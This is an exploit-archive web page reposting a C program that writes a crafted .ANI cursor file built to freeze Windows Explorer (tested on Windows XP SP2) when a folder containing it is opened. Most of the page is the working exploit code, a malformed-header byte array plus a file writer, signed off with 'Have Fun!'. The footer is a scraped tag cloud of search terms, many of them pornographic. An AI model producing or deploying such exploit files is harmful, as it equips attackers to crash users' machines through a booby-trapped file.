about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MS Windows Explorer Unspecified .ANI File Denial of Service Exploit




2007-04-08 MS Windows Explorer Unspecified .ANI File Denial of Service Exploit
Rated as : Critical

/****************************************************************************
*              MS Windows Explorer Unspecified .ANI File DoS              
 *
*                                                                         
 *
*                                                                         
 *
* Another .Ani bug that freezes Explorer if you open a folder that
contains *
* a crafted file.                                                         
 *
*                                                                         
 *
* Tested against Win XP SP2 FR.                                           
 *
* Have Fun!                                                               
 *
*                                                                         
 *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                       
       *
****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

unsigned char Ani_headers[] = 
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00"
"\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00"
"\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00"
"\x00\x00\x03" //Change this last char to avoid crash
;

int main(int argc, char* argv[])
{
	FILE* anifile;
	char evilbuff[4000];
	printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n");
	printf("[+] Coded by Marsu
<Marsupilamipowa@hotmail.fr>\n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ani>\n",argv[0]);
		return 0;
	}
	
	memset(evilbuff,'A',4000);
	memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1);
	
	if ((anifile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;
	}
	fwrite( evilbuff, 1, 4000, anifile );
	fclose(anifile);
	printf("[+] Done. Have fun!\n");
	return 0;
	
}
securitydot.net - 2007-04-08

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 22:12:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo Platinum Putar seka SKU mysql expl Free+sexy+ addguest mambo Remo Namitha wa www.sexygi Www.99bb.c Chturica s WWW.SEXYPH W.w.w.inde php-nuke 2 DOS jdgjat amember .h www.yxx525 www.635205 sailor moo link.sixwa Www.sexint WWW.sxe.co mambo Remo Pernak-per ssh-scan.c www.eurofu all cartoo dar laman ako www.1224.n mambo Remo privatefee mom+son+se pig tits codmsgboom www.Lnjhw. news for c www.b533.c videoporno www.dior16 max os x Hubungan s www indin mom+son+se pix cisco www.xxxero web-cyradm www.sexgir